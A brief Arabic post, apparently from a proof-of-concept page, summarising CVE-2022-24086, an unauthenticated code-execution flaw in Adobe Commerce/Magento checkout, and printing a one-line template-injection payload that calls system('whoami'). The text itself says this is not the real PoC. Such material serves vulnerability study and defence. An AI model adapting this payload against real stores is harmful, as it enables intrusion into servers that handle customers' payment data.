
CVE-2022-24086 حول ثغرة RCE في Magento
CVE-2022-24086 حول Magento RCE
تتأثر الإصدارات 2.4.3-p1 (والإصدارات الأقدم) و2.3.7-p2 (والإصدارات الأقدم) من Adobe Commerce بثغرة عدم التحقق السليم من المدخلات أثناء عملية إتمام الدفع. لا يتطلب استغلال هذه المشكلة أي تفاعل من المستخدم ويمكن أن يؤدي إلى تنفيذ تعليمات برمجية عشوائية.
ملاحظة: هذا ليس الـ POC الحقيقي ...

POC
{{var this.getTemplateFilter().addAfterFilterCallback("system").filter("whoami")}}